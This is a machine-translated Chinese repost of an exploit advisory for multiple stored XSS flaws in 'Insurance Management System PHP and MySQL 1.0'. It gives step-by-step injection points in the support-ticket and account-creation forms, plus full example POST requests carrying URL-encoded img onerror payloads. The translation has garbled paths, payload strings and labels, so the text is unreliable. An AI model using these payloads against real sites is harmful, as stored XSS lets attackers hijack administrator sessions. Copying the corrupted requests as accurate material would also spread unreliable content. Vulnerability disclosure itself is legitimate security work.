保险管理系统PHP和MySQL 1.0-多个存储的XS

HackApt-37 Team · 04 9, 2025

＃利用标题:保险管理系统PHP和MySQL 1.0-多重
存储的XSS
＃日期: 2024-02-08
＃利用作者:hakkıToklu
＃供应商homepage: https://www.sourcecodester.com
＃软件link:

正在加载...

www.sourcecodester.com

＃版本: 1.0
＃测试在: Windows 11/php 8.1 XAMPP 3.3.0
支持票
单击“支持门票”生成并添加有效载荷img src=x OneError=提示（'XSS'）以主题和说明字段，然后发送请求。当管理员访问支持门票页面时，将触发XSS。
示例请求:
POST/E-ISUNSURAME/SCRIPT/user/core/new_ticket http/1.1
HOST: LOCALHOST
content-type:应用程序/x-www-form-urlenceded
内容长度: 139
cookie: phpsessid=17ot0ij8idrm2br6mmmc54fg15; __insuarance__logged=1; __insuarance__key=lg3lfibjcn9dkvxkys41
类别=4subject=％3CIMG+SRC％3DX+ONERROR％3DPROMPT％28％22XS％22％29％29％3Edescription=％3CIMG+SRC％3DX+ONERROR％3DPrompt％3DPROMPT％3DPROMPT％28％28％22 XSS％22％29％29％3esbmit=1
创建账户
单击登录页面上的新帐户按钮，然后填写字段。注入img src=x onerror=提示（'xss'）有效载荷到fname，lname，City和Street参数，然后单击创建帐户按钮。当管理员访问用户页面时，将触发XSS。
示例请求:
POST/E-ISSURANCE/SCRIPT/CORE/NEW_ACCOUNT HTTP/1.1
HOST: LOCALHOST
content-type:应用程序/x-www-form-urlenceded
内容长度: 303
cookie: phpsessid=17ot0ij8idrm2br6mmc54fg15
fname=％3CIMG+SRC％3DX+ONERROR％3DPrompt％28％22XS％22％29％3ELNAME=％3CIMG+SRC％3DX+ONERROR％3DPROMPT％28％28％22XSS％22XSS％22％29％3EGENDER=MA=MA Lephone=55554443322CITY=％3CIMG+SRC％3DX+ONERROR％3DPrompt％28％22XSS％22％29％3Eemail=test1％40Test.compassword=test12345submit=1

H	Zenphoto 1.6-多个存储的XSS HackApt-37 Team 04 9, 2025 POC/?Day
H	Rukovoditel 3.4.1-多个存储的XSS HackApt-37 Team 04 9, 2025 POC/?Day